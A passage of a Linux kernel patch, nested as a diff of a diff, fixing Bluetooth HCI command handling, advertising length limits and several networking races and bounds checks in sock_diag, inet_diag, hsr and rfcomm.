+-	if (bt_cb(hdev->sent_cmd)->hci.req_flags & HCI_REQ_SKB) {
+-		*req_complete_skb = bt_cb(hdev->sent_cmd)->hci.req_complete_skb;
++	if (skb && bt_cb(skb)->hci.req_flags & HCI_REQ_SKB) {
++		*req_complete_skb = bt_cb(skb)->hci.req_complete_skb;
+ 		return;
+ 	}
+ 
+-	if (bt_cb(hdev->sent_cmd)->hci.req_complete) {
+-		*req_complete = bt_cb(hdev->sent_cmd)->hci.req_complete;
++	if (skb && bt_cb(skb)->hci.req_complete) {
++		*req_complete = bt_cb(skb)->hci.req_complete;
+ 		return;
+ 	}
+ 
+@@ -4116,6 +4152,36 @@ static void hci_rx_work(struct work_struct *work)
+ 	}
+ }
+ 
++static void hci_send_cmd_sync(struct hci_dev *hdev, struct sk_buff *skb)
++{
++	int err;
++
++	bt_dev_dbg(hdev, "skb %p", skb);
++
++	kfree_skb(hdev->sent_cmd);
++
++	hdev->sent_cmd = skb_clone(skb, GFP_KERNEL);
++	if (!hdev->sent_cmd) {
++		skb_queue_head(&hdev->cmd_q, skb);
++		queue_work(hdev->workqueue, &hdev->cmd_work);
++		return;
++	}
++
++	err = hci_send_frame(hdev, skb);
++	if (err < 0) {
++		hci_cmd_sync_cancel_sync(hdev, err);
++		return;
++	}
++
++	if (hci_req_status_pend(hdev) &&
++	    !hci_dev_test_and_set_flag(hdev, HCI_CMD_PENDING)) {
++		kfree_skb(hdev->req_skb);
++		hdev->req_skb = skb_clone(hdev->sent_cmd, GFP_KERNEL);
++	}
++
++	atomic_dec(&hdev->cmd_cnt);
++}
++
+ static void hci_cmd_work(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev, cmd_work);
+@@ -4130,30 +4196,15 @@ static void hci_cmd_work(struct work_struct *work)
+ 		if (!skb)
+ 			return;
+ 
+-		kfree_skb(hdev->sent_cmd);
+-
+-		hdev->sent_cmd = skb_clone(skb, GFP_KERNEL);
+-		if (hdev->sent_cmd) {
+-			int res;
+-			if (hci_req_status_pend(hdev))
+-				hci_dev_set_flag(hdev, HCI_CMD_PENDING);
+-			atomic_dec(&hdev->cmd_cnt);
+-
+-			res = hci_send_frame(hdev, skb);
+-			if (res < 0)
+-				__hci_cmd_sync_cancel(hdev, -res);
+-
+-			rcu_read_lock();
+-			if (test_bit(HCI_RESET, &hdev->flags) ||
+-			    hci_dev_test_flag(hdev, HCI_CMD_DRAIN_WORKQUEUE))
+-				cancel_delayed_work(&hdev->cmd_timer);
+-			else
+-				queue_delayed_work(hdev->workqueue, &hdev->cmd_timer,
+-						   HCI_CMD_TIMEOUT);
+-			rcu_read_unlock();
+-		} else {
+-			skb_queue_head(&hdev->cmd_q, skb);
+-			queue_work(hdev->workqueue, &hdev->cmd_work);
+-		}
++		hci_send_cmd_sync(hdev, skb);
++
++		rcu_read_lock();
++		if (test_bit(HCI_RESET, &hdev->flags) ||
++		    hci_dev_test_flag(hdev, HCI_CMD_DRAIN_WORKQUEUE))
++			cancel_delayed_work(&hdev->cmd_timer);
++		else
++			queue_delayed_work(hdev->workqueue, &hdev->cmd_timer,
++					   HCI_CMD_TIMEOUT);
++		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 452d839c152fc..b150dee88f35c 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -1761,7 +1761,7 @@ static void store_pending_adv_report(struct hci_dev *hdev, bdaddr_t *bdaddr,
+ {
+ 	struct discovery_state *d = &hdev->discovery;
+ 
+-	if (len > HCI_MAX_AD_LENGTH)
++	if (len > max_adv_len(hdev))
+ 		return;
+ 
+ 	bacpy(&d->last_adv_addr, bdaddr);
+@@ -3567,8 +3567,6 @@ static void hci_remote_name_evt(struct hci_dev *hdev, void *data,
+ 
+ 	bt_dev_dbg(hdev, "status 0x%2.2x", ev->status);
+ 
+-	hci_conn_check_pending(hdev);
+-
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+@@ -4331,7 +4329,7 @@ static void hci_cmd_status_evt(struct hci_dev *hdev, void *data,
+ 	 * (since for this kind of commands there will not be a command
+ 	 * complete event).
+ 	 */
+-	if (ev->status || (hdev->sent_cmd && !hci_skb_event(hdev->sent_cmd))) {
++	if (ev->status || (hdev->req_skb && !hci_skb_event(hdev->req_skb))) {
+ 		hci_req_cmd_complete(hdev, *opcode, ev->status, req_complete,
+ 				     req_complete_skb);
+ 		if (hci_dev_test_flag(hdev, HCI_CMD_PENDING)) {
+@@ -6242,8 +6240,9 @@ static void process_adv_report(struct hci_dev *hdev, u8 type, bdaddr_t *bdaddr,
+ 		return;
+ 	}
+ 
+-	if (!ext_adv && len > HCI_MAX_AD_LENGTH) {
+-		bt_dev_err_ratelimited(hdev, "legacy adv larger than 31 bytes");
++	if (len > max_adv_len(hdev)) {
++		bt_dev_err_ratelimited(hdev,
++				       "adv larger than maximum supported");
+ 		return;
+ 	}
+ 
+@@ -6308,7 +6307,8 @@ static void process_adv_report(struct hci_dev *hdev, u8 type, bdaddr_t *bdaddr,
+ 	 */
+ 	conn = check_pending_le_conn(hdev, bdaddr, bdaddr_type, bdaddr_resolved,
+ 				     type);
+-	if (!ext_adv && conn && type == LE_ADV_IND && len <= HCI_MAX_AD_LENGTH) {
++	if (!ext_adv && conn && type == LE_ADV_IND &&
++	    len <= max_adv_len(hdev)) {
+ 		/* Store report for later inclusion by
+ 		 * mgmt_device_connected
+ 		 */
+@@ -6449,7 +6449,7 @@ static void hci_le_adv_report_evt(struct hci_dev *hdev, void *data,
+ 					info->length + 1))
+ 			break;
+ 
+-		if (info->length <= HCI_MAX_AD_LENGTH) {
++		if (info->length <= max_adv_len(hdev)) {
+ 			rssi = info->data[info->length];
+ 			process_adv_report(hdev, info->type, &info->bdaddr,
+ 					   info->bdaddr_type, NULL, 0, rssi,
+@@ -7149,10 +7149,10 @@ static void hci_le_meta_evt(struct hci_dev *hdev, void *data,
+ 	bt_dev_dbg(hdev, "subevent 0x%2.2x", ev->subevent);
+ 
+ 	/* Only match event if command OGF is for LE */
+-	if (hdev->sent_cmd &&
+-	    hci_opcode_ogf(hci_skb_opcode(hdev->sent_cmd)) == 0x08 &&
+-	    hci_skb_event(hdev->sent_cmd) == ev->subevent) {
+-		*opcode = hci_skb_opcode(hdev->sent_cmd);
++	if (hdev->req_skb &&
++	    hci_opcode_ogf(hci_skb_opcode(hdev->req_skb)) == 0x08 &&
++	    hci_skb_event(hdev->req_skb) == ev->subevent) {
++		*opcode = hci_skb_opcode(hdev->req_skb);
+ 		hci_req_cmd_complete(hdev, *opcode, 0x00, req_complete,
+ 				     req_complete_skb);
+ 	}
+@@ -7539,10 +7539,10 @@ void hci_event_packet(struct hci_dev *hdev, struct sk_buff *skb)
+ 	}
+ 
+ 	/* Only match event if command OGF is not for LE */
+-	if (hdev->sent_cmd &&
+-	    hci_opcode_ogf(hci_skb_opcode(hdev->sent_cmd)) != 0x08 &&
+-	    hci_skb_event(hdev->sent_cmd) == event) {
+-		hci_req_cmd_complete(hdev, hci_skb_opcode(hdev->sent_cmd),
++	if (hdev->req_skb &&
++	    hci_opcode_ogf(hci_skb_opcode(hdev->req_skb)) != 0x08 &&
++	    hci_skb_event(hdev->req_skb) == event) {
++		hci_req_cmd_complete(hdev, hci_skb_opcode(hdev->req_skb),
+ 				     status, &req_complete, &req_complete_skb);
+ 		req_evt = event;
+ 	}
+diff --git a/net/bluetooth/hci_request.c b/net/bluetooth/hci_request.c
+index f7e006a363829..4468647df6722 100644
+--- a/net/bluetooth/hci_request.c
++++ b/net/bluetooth/hci_request.c
+@@ -916,7 +916,7 @@ void hci_request_setup(struct hci_dev *hdev)
+ 
+ void hci_request_cancel_all(struct hci_dev *hdev)
+ {
+-	__hci_cmd_sync_cancel(hdev, ENODEV);
++	hci_cmd_sync_cancel_sync(hdev, ENODEV);
+ 
+ 	cancel_interleave_scan(hdev);
+ }
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index a337340464567..65b2ad34179f8 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -31,6 +31,10 @@ static void hci_cmd_sync_complete(struct hci_dev *hdev, u8 result, u16 opcode,
+ 	hdev->req_result = result;
+ 	hdev->req_status = HCI_REQ_DONE;
+ 
++	/* Free the request command so it is not used as response */
++	kfree_skb(hdev->req_skb);
++	hdev->req_skb = NULL;
++
+ 	if (skb) {
+ 		struct sock *sk = hci_skb_sk(skb);
+ 
+@@ -38,7 +42,7 @@ static void hci_cmd_sync_complete(struct hci_dev *hdev, u8 result, u16 opcode,
+ 		if (sk)
+ 			sock_put(sk);
+ 
+-		hdev->req_skb = skb_get(skb);
++		hdev->req_rsp = skb_get(skb);
+ 	}
+ 
+ 	wake_up_interruptible(&hdev->req_wait_q);
+@@ -186,8 +190,8 @@ struct sk_buff *__hci_cmd_sync_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 
+ 	hdev->req_status = 0;
+ 	hdev->req_result = 0;
+-	skb = hdev->req_skb;
+-	hdev->req_skb = NULL;
++	skb = hdev->req_rsp;
++	hdev->req_rsp = NULL;
+ 
+ 	bt_dev_dbg(hdev, "end: err %d", err);
+ 
+@@ -651,7 +655,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 	mutex_unlock(&hdev->cmd_sync_work_lock);
+ }
+ 
+-void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
++void hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+ {
+ 	bt_dev_dbg(hdev, "err 0x%2.2x", err);
+ 
+@@ -659,15 +663,17 @@ void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+ 		hdev->req_result = err;
+ 		hdev->req_status = HCI_REQ_CANCELED;
+ 
+-		cancel_delayed_work_sync(&hdev->cmd_timer);
+-		cancel_delayed_work_sync(&hdev->ncmd_timer);
+-		atomic_set(&hdev->cmd_cnt, 1);
+-
+-		wake_up_interruptible(&hdev->req_wait_q);
++		queue_work(hdev->workqueue, &hdev->cmd_sync_cancel_work);
+ 	}
+ }
++EXPORT_SYMBOL(hci_cmd_sync_cancel);
+ 
+-void hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
++/* Cancel ongoing command request synchronously:
++ *
++ * - Set result and mark status to HCI_REQ_CANCELED
++ * - Wakeup command sync thread
++ */
++void hci_cmd_sync_cancel_sync(struct hci_dev *hdev, int err)
+ {
+ 	bt_dev_dbg(hdev, "err 0x%2.2x", err);
+ 
+@@ -675,13 +681,17 @@ void hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+ 		hdev->req_result = err;
+ 		hdev->req_status = HCI_REQ_CANCELED;
+ 
+-		queue_work(hdev->workqueue, &hdev->cmd_sync_cancel_work);
++		wake_up_interruptible(&hdev->req_wait_q);
+ 	}
+ }
+-EXPORT_SYMBOL(hci_cmd_sync_cancel);
++EXPORT_SYMBOL(hci_cmd_sync_cancel_sync);
+ 
+-int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+-		       void *data, hci_cmd_sync_work_destroy_t destroy)
++/* Submit HCI command to be run in as cmd_sync_work:
++ *
++ * - hdev must _not_ be unregistered
++ */
++int hci_cmd_sync_submit(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
++			void *data, hci_cmd_sync_work_destroy_t destroy)
+ {
+ 	struct hci_cmd_sync_work_entry *entry;
+ 	int err = 0;
+@@ -711,6 +721,23 @@ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 	mutex_unlock(&hdev->unregister_lock);
+ 	return err;
+ }
++EXPORT_SYMBOL(hci_cmd_sync_submit);
++
++/* Queue HCI command:
++ *
++ * - hdev must be running
++ */
++int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
++		       void *data, hci_cmd_sync_work_destroy_t destroy)
++{
++	/* Only queue command if hdev is running which means it had been opened
++	 * and is either on init phase or is already up.
++	 */
++	if (!test_bit(HCI_RUNNING, &hdev->flags))
++		return -ENETDOWN;
++
++	return hci_cmd_sync_submit(hdev, func, data, destroy);
++}
+ EXPORT_SYMBOL(hci_cmd_sync_queue);
+ 
+ int hci_update_eir_sync(struct hci_dev *hdev)
+@@ -4856,6 +4883,11 @@ int hci_dev_open_sync(struct hci_dev *hdev)
+ 			hdev->sent_cmd = NULL;
+ 		}
+ 
++		if (hdev->req_skb) {
++			kfree_skb(hdev->req_skb);
++			hdev->req_skb = NULL;
++		}
++
+ 		clear_bit(HCI_RUNNING, &hdev->flags);
+ 		hci_sock_dev_event(hdev, HCI_DEV_CLOSE);
+ 
+@@ -5017,6 +5049,12 @@ int hci_dev_close_sync(struct hci_dev *hdev)
+ 		hdev->sent_cmd = NULL;
+ 	}
+ 
++	/* Drop last request */
++	if (hdev->req_skb) {
++		kfree_skb(hdev->req_skb);
++		hdev->req_skb = NULL;
++	}
++
+ 	clear_bit(HCI_RUNNING, &hdev->flags);
+ 	hci_sock_dev_event(hdev, HCI_DEV_CLOSE);
+ 
+@@ -5209,22 +5247,27 @@ static int hci_disconnect_sync(struct hci_dev *hdev, struct hci_conn *conn,
+ }
+ 
+ static int hci_le_connect_cancel_sync(struct hci_dev *hdev,
+-				      struct hci_conn *conn)
++				      struct hci_conn *conn, u8 reason)
+ {
++	/* Return reason if scanning since the connection shall probably be
++	 * cleanup directly.
++	 */
+ 	if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+-		return 0;
++		return reason;
+ 
+-	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++	if (conn->role == HCI_ROLE_SLAVE ||
++	    test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
+ 		return 0;
+ 
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_CREATE_CONN_CANCEL,
+ 				     0, NULL, HCI_CMD_TIMEOUT);
+ }
+ 
+-static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn)
++static int hci_connect_cancel_sync(struct hci_dev *hdev, struct hci_conn *conn,
++				   u8 reason)
+ {
+ 	if (conn->type == LE_LINK)
+-		return hci_le_connect_cancel_sync(hdev, conn);
++		return hci_le_connect_cancel_sync(hdev, conn, reason);
+ 
+ 	if (hdev->hci_ver < BLUETOOTH_VER_1_2)
+ 		return 0;
+@@ -5277,9 +5320,11 @@ int hci_abort_conn_sync(struct hci_dev *hdev, struct hci_conn *conn, u8 reason)
+ 	case BT_CONFIG:
+ 		return hci_disconnect_sync(hdev, conn, reason);
+ 	case BT_CONNECT:
+-		err = hci_connect_cancel_sync(hdev, conn);
++		err = hci_connect_cancel_sync(hdev, conn, reason);
+ 		/* Cleanup hci_conn object if it cannot be cancelled as it
+-		 * likelly means the controller and host stack are out of sync.
++		 * likelly means the controller and host stack are out of sync
++		 * or in case of LE it was still scanning so it can be cleanup
++		 * safely.
+ 		 */
+ 		if (err) {
+ 			hci_dev_lock(hdev);
+@@ -6194,7 +6239,7 @@ int hci_le_create_conn_sync(struct hci_dev *hdev, struct hci_conn *conn)
+ 
+ done:
+ 	if (err == -ETIMEDOUT)
+-		hci_le_connect_cancel_sync(hdev, conn);
++		hci_le_connect_cancel_sync(hdev, conn, 0x00);
+ 
+ 	/* Re-enable advertising after the connection attempt is finished. */
+ 	hci_resume_advertising_sync(hdev);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 6d631a2e60166..716f6dc4934b7 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -1039,6 +1039,8 @@ static void rpa_expired(struct work_struct *work)
+ 	hci_cmd_sync_queue(hdev, rpa_expired_sync, NULL, NULL);
+ }
+ 
++static int set_discoverable_sync(struct hci_dev *hdev, void *data);
++
+ static void discov_off(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev,
+@@ -1057,7 +1059,7 @@ static void discov_off(struct work_struct *work)
+ 	hci_dev_clear_flag(hdev, HCI_DISCOVERABLE);
+ 	hdev->discov_timeout = 0;
+ 
+-	hci_update_discoverable(hdev);
++	hci_cmd_sync_queue(hdev, set_discoverable_sync, NULL, NULL);
+ 
+ 	mgmt_new_settings(hdev);
+ 
+@@ -1399,8 +1401,16 @@ static int set_powered(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto failed;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, set_powered_sync, cmd,
+-				 mgmt_set_powered_complete);
++	/* Cancel potentially blocking sync operation before power off */
++	if (cp->val == 0x00) {
++		hci_cmd_sync_cancel_sync(hdev, -EHOSTDOWN);
++		err = hci_cmd_sync_queue(hdev, set_powered_sync, cmd,
++					 mgmt_set_powered_complete);
++	} else {
++		/* Use hci_cmd_sync_submit since hdev might not be running */
++		err = hci_cmd_sync_submit(hdev, set_powered_sync, cmd,
++					  mgmt_set_powered_complete);
++	}
+ 
+ 	if (err < 0)
+ 		mgmt_pending_remove(cmd);
+@@ -3573,18 +3583,6 @@ static int pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 	return err;
+ }
+ 
+-static int abort_conn_sync(struct hci_dev *hdev, void *data)
+-{
+-	struct hci_conn *conn;
+-	u16 handle = PTR_ERR(data);
+-
+-	conn = hci_conn_hash_lookup_handle(hdev, handle);
+-	if (!conn)
+-		return 0;
+-
+-	return hci_abort_conn_sync(hdev, conn, HCI_ERROR_REMOTE_USER_TERM);
+-}
+-
+ static int cancel_pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 			      u16 len)
+ {
+@@ -3635,8 +3633,7 @@ static int cancel_pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 					      le_addr_type(addr->type));
+ 
+ 	if (conn->conn_reason == CONN_REASON_PAIR_DEVICE)
+-		hci_cmd_sync_queue(hdev, abort_conn_sync, ERR_PTR(conn->handle),
+-				   NULL);
++		hci_abort_conn(conn, HCI_ERROR_REMOTE_USER_TERM);
+ 
+ unlock:
+ 	hci_dev_unlock(hdev);
+@@ -5381,9 +5378,9 @@ static u8 parse_adv_monitor_pattern(struct adv_monitor *m, u8 pattern_count,
+ 	for (i = 0; i < pattern_count; i++) {
+ 		offset = patterns[i].offset;
+ 		length = patterns[i].length;
+-		if (offset >= HCI_MAX_AD_LENGTH ||
+-		    length > HCI_MAX_AD_LENGTH ||
+-		    (offset + length) > HCI_MAX_AD_LENGTH)
++		if (offset >= HCI_MAX_EXT_AD_LENGTH ||
++		    length > HCI_MAX_EXT_AD_LENGTH ||
++		    (offset + length) > HCI_MAX_EXT_AD_LENGTH)
+ 			return MGMT_STATUS_INVALID_PARAMS;
+ 
+ 		p = kmalloc(sizeof(*p), GFP_KERNEL);
+@@ -8439,8 +8436,8 @@ static int read_adv_features(struct sock *sk, struct hci_dev *hdev,
+ 	supported_flags = get_supported_adv_flags(hdev);
+ 
+ 	rp->supported_flags = cpu_to_le32(supported_flags);
+-	rp->max_adv_data_len = HCI_MAX_AD_LENGTH;
+-	rp->max_scan_rsp_len = HCI_MAX_AD_LENGTH;
++	rp->max_adv_data_len = max_adv_len(hdev);
++	rp->max_scan_rsp_len = max_adv_len(hdev);
+ 	rp->max_instances = hdev->le_num_of_adv_sets;
+ 	rp->num_instances = hdev->adv_instance_cnt;
+ 
+@@ -8468,7 +8465,7 @@ static int read_adv_features(struct sock *sk, struct hci_dev *hdev,
+ 
+ static u8 calculate_name_len(struct hci_dev *hdev)
+ {
+-	u8 buf[HCI_MAX_SHORT_NAME_LENGTH + 3];
++	u8 buf[HCI_MAX_SHORT_NAME_LENGTH + 2]; /* len + type + name */
+ 
+ 	return eir_append_local_name(hdev, buf, 0);
+ }
+@@ -8476,7 +8473,7 @@ static u8 calculate_name_len(struct hci_dev *hdev)
+ static u8 tlv_data_max_len(struct hci_dev *hdev, u32 adv_flags,
+ 			   bool is_adv_data)
+ {
+-	u8 max_len = HCI_MAX_AD_LENGTH;
++	u8 max_len = max_adv_len(hdev);
+ 
+ 	if (is_adv_data) {
+ 		if (adv_flags & (MGMT_ADV_FLAG_DISCOV |
+@@ -9764,14 +9761,6 @@ void mgmt_device_disconnected(struct hci_dev *hdev, bdaddr_t *bdaddr,
+ 	struct mgmt_ev_device_disconnected ev;
+ 	struct sock *sk = NULL;
+ 
+-	/* The connection is still in hci_conn_hash so test for 1
+-	 * instead of 0 to know if this is the last one.
+-	 */
+-	if (mgmt_powering_down(hdev) && hci_conn_count(hdev) == 1) {
+-		cancel_delayed_work(&hdev->power_off);
+-		queue_work(hdev->req_workqueue, &hdev->power_off.work);
+-	}
+-
+ 	if (!mgmt_connected)
+ 		return;
+ 
+@@ -9828,14 +9817,6 @@ void mgmt_connect_failed(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 link_type,
+ {
+ 	struct mgmt_ev_connect_failed ev;
+ 
+-	/* The connection is still in hci_conn_hash so test for 1
+-	 * instead of 0 to know if this is the last one.
+-	 */
+-	if (mgmt_powering_down(hdev) && hci_conn_count(hdev) == 1) {
+-		cancel_delayed_work(&hdev->power_off);
+-		queue_work(hdev->req_workqueue, &hdev->power_off.work);
+-	}
+-
+ 	bacpy(&ev.addr.bdaddr, bdaddr);
+ 	ev.addr.type = link_to_bdaddr(link_type, addr_type);
+ 	ev.status = mgmt_status(status);
+diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c
+index 8d6fce9005bdd..4f54c7df3a94f 100644
+--- a/net/bluetooth/rfcomm/core.c
++++ b/net/bluetooth/rfcomm/core.c
+@@ -1937,7 +1937,7 @@ static struct rfcomm_session *rfcomm_process_rx(struct rfcomm_session *s)
+ 	/* Get data directly from socket receive queue without copying it. */
+ 	while ((skb = skb_dequeue(&sk->sk_receive_queue))) {
+ 		skb_orphan(skb);
+-		if (!skb_linearize(skb)) {
++		if (!skb_linearize(skb) && sk->sk_state != BT_CLOSED) {
+ 			s = rfcomm_recv_frame(s, skb);
+ 			if (!s)
+ 				break;
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 60619fe8af5fc..65284eeec7de5 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -2271,7 +2271,7 @@ void dev_queue_xmit_nit(struct sk_buff *skb, struct net_device *dev)
+ 	rcu_read_lock();
+ again:
+ 	list_for_each_entry_rcu(ptype, ptype_list, list) {
+-		if (ptype->ignore_outgoing)
++		if (READ_ONCE(ptype->ignore_outgoing))
+ 			continue;
+ 
+ 		/* Never send packets back to the socket
+@@ -6645,6 +6645,8 @@ static int napi_threaded_poll(void *data)
+ 	void *have;
+ 
+ 	while (!napi_thread_wait(napi)) {
++		unsigned long last_qs = jiffies;
++
+ 		for (;;) {
+ 			bool repoll = false;
+ 
+@@ -6659,6 +6661,7 @@ static int napi_threaded_poll(void *data)
+ 			if (!repoll)
+ 				break;
+ 
++			rcu_softirq_qs_periodic(last_qs);
+ 			cond_resched();
+ 		}
+ 	}
+diff --git a/net/core/scm.c b/net/core/scm.c
+index e762a4b8a1d22..a877c4ef4c256 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -105,7 +105,7 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
+ 		if (fd < 0 || !(file = fget_raw(fd)))
+ 			return -EBADF;
+ 		/* don't allow io_uring files */
+-		if (io_uring_get_socket(file)) {
++		if (io_is_uring_fops(file)) {
+ 			fput(file);
+ 			return -EINVAL;
+ 		}
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index d4bd10f8723df..e38a4c7449f62 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -6500,6 +6500,14 @@ static struct skb_ext *skb_ext_maybe_cow(struct skb_ext *old,
+ 		for (i = 0; i < sp->len; i++)
+ 			xfrm_state_hold(sp->xvec[i]);
+ 	}
++#endif
++#ifdef CONFIG_MCTP_FLOWS
++	if (old_active & (1 << SKB_EXT_MCTP)) {
++		struct mctp_flow *flow = skb_ext_get_ptr(old, SKB_EXT_MCTP);
++
++		if (flow->key)
++			refcount_inc(&flow->key->refs);
++	}
+ #endif
+ 	__skb_ext_put(old);
+ 	return new;
+diff --git a/net/core/sock_diag.c b/net/core/sock_diag.c
+index f7cf74cdd3db1..e6ea6764d10ab 100644
+--- a/net/core/sock_diag.c
++++ b/net/core/sock_diag.c
+@@ -190,7 +190,7 @@ int sock_diag_register(const struct sock_diag_handler *hndl)
+ 	if (sock_diag_handlers[hndl->family])
+ 		err = -EBUSY;
+ 	else
+-		sock_diag_handlers[hndl->family] = hndl;
++		WRITE_ONCE(sock_diag_handlers[hndl->family], hndl);
+ 	mutex_unlock(&sock_diag_table_mutex);
+ 
+ 	return err;
+@@ -206,7 +206,7 @@ void sock_diag_unregister(const struct sock_diag_handler *hnld)
+ 
+ 	mutex_lock(&sock_diag_table_mutex);
+ 	BUG_ON(sock_diag_handlers[family] != hnld);
+-	sock_diag_handlers[family] = NULL;
++	WRITE_ONCE(sock_diag_handlers[family], NULL);
+ 	mutex_unlock(&sock_diag_table_mutex);
+ }
+ EXPORT_SYMBOL_GPL(sock_diag_unregister);
+@@ -224,7 +224,7 @@ static int __sock_diag_cmd(struct sk_buff *skb, struct nlmsghdr *nlh)
+ 		return -EINVAL;
+ 	req->sdiag_family = array_index_nospec(req->sdiag_family, AF_MAX);
+ 
+-	if (sock_diag_handlers[req->sdiag_family] == NULL)
++	if (READ_ONCE(sock_diag_handlers[req->sdiag_family]) == NULL)
+ 		sock_load_diag_module(req->sdiag_family, 0);
+ 
+ 	mutex_lock(&sock_diag_table_mutex);
+@@ -283,12 +283,12 @@ static int sock_diag_bind(struct net *net, int group)
+ 	switch (group) {
+ 	case SKNLGRP_INET_TCP_DESTROY:
+ 	case SKNLGRP_INET_UDP_DESTROY:
+-		if (!sock_diag_handlers[AF_INET])
++		if (!READ_ONCE(sock_diag_handlers[AF_INET]))
+ 			sock_load_diag_module(AF_INET, 0);
+ 		break;
+ 	case SKNLGRP_INET6_TCP_DESTROY:
+ 	case SKNLGRP_INET6_UDP_DESTROY:
+-		if (!sock_diag_handlers[AF_INET6])
++		if (!READ_ONCE(sock_diag_handlers[AF_INET6]))
+ 			sock_load_diag_module(AF_INET6, 0);
+ 		break;
+ 	}
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 0b01998780952..e44a039e36afe 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -235,6 +235,10 @@ struct hsr_node *hsr_get_node(struct hsr_port *port, struct list_head *node_db,
+ 	 */
+ 	if (ethhdr->h_proto == htons(ETH_P_PRP) ||
+ 	    ethhdr->h_proto == htons(ETH_P_HSR)) {
++		/* Check if skb contains hsr_ethhdr */
++		if (skb->mac_len < sizeof(struct hsr_ethhdr))
++			return NULL;
++
+ 		/* Use the existing sequence_nr from the tag as starting point
+ 		 * for filtering duplicate frames.
+ 		 */
+diff --git a/net/hsr/hsr_main.c b/net/hsr/hsr_main.c
+index b099c31501509..257b50124cee5 100644
+--- a/net/hsr/hsr_main.c
++++ b/net/hsr/hsr_main.c
+@@ -148,14 +148,21 @@ static struct notifier_block hsr_nb = {
+ 
+ static int __init hsr_init(void)
+ {
+-	int res;
++	int err;
+ 
+ 	BUILD_BUG_ON(sizeof(struct hsr_tag) != HSR_HLEN);
+ 
+-	register_netdevice_notifier(&hsr_nb);
+-	res = hsr_netlink_init();
++	err = register_netdevice_notifier(&hsr_nb);
++	if (err)
++		return err;
++
++	err = hsr_netlink_init();
++	if (err) {
++		unregister_netdevice_notifier(&hsr_nb);
++		return err;
++	}
+ 
+-	return res;
++	return 0;
+ }
+ 
+ static void __exit hsr_exit(void)
+diff --git a/net/ipv4/inet_diag.c b/net/ipv4/inet_diag.c
+index f7426926a1041..8f690a6e61baa 100644
+--- a/net/ipv4/inet_diag.c
++++ b/net/ipv4/inet_diag.c
+@@ -57,7 +57,7 @@ static const struct inet_diag_handler *inet_diag_lock_handler(int proto)
+ 		return ERR_PTR(-ENOENT);
+ 	}
+ 
+-	if (!inet_diag_table[proto])
++	if (!READ_ONCE(inet_diag_table[proto]))
+ 		sock_load_diag_module(AF_INET, proto);
+ 
+ 	mutex_lock(&inet_diag_table_mutex);
+@@ -1419,7 +1419,7 @@ int inet_diag_register(const struct inet_diag_handler *h)
+ 	mutex_lock(&inet_diag_table_mutex);
+ 	err = -EEXIST;
+ 	if (!inet_diag_table[type]) {
+-		inet_diag_table[type] = h;
++		WRITE_ONCE(inet_diag_table[type], h);
+ 		err = 0;
+ 	}
+ 	mutex_unlock(&inet_diag_table_mutex);
+@@ -1436,7 +1436,7 @@ void inet_diag_unregister(const struct inet_diag_handler *h)
+ 		return;
+ 
+ 	mutex_lock(&inet_diag_table_mutex);
+-	inet_diag_table[type] = NULL;
++	WRITE_ONCE(inet_diag_table[type], NULL);
+ 	mutex_unlock(&inet_diag_table_mutex);
+ }
+ EXPORT_SYMBOL_GPL(inet_diag_unregister);
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 56776e1b1de52..0ad25e6783ac7 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1117,7 +1117,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 		sock_prot_inuse_add(net, sk->sk_prot, -1);
+ 
+ 		spin_lock(lock);
+-		sk_nulls_del_node_init_rcu(sk);
++		__sk_nulls_del_node_init_rcu(sk);
+ 		spin_unlock(lock);
+ 
+ 		sk->sk_hash = 0;
